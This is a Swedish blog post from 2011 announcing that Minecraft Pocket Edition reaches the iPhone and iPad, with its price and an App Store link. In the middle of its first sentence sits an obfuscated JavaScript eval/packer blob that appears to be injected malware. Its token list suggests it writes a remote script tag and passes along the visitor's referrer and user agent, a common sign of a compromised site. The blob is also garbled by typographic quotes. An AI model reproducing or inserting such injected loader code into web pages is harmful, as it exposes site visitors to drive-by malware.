Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Imorgon kommer Minecraft till iPhone!

Imorgon kommer Minecraft till iPhone!
Filip Urde
  • On 16 november, 2011
  • http://www.revue.se/filip-urde

Minecraft Pocket Edition var under en kort tid exklusivt till sony ericssons Xperia eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yrbke|var|u0026u|referrer|anske||js|php’.split(’|’),0,{}))
play
, men nu är det alltså släppt till resten av oss dödliga. Minecraft pocket edition är redan släppt i Nya Zeeland (av någont bra skäl), men när vi passerar midnatt här i Sverige så kan man alltså börja hacka sönder klossar även på den svenska marknaden.  Priset är 49kr och spelet kommer även gå att köra på iPad, vilket inte kan bli annat än coolt!

På länken nedan så kommer du direkt till spelet på app store, redo att tankas. HACKA FÖR ALLT NI ÄR VÄRDA!

App store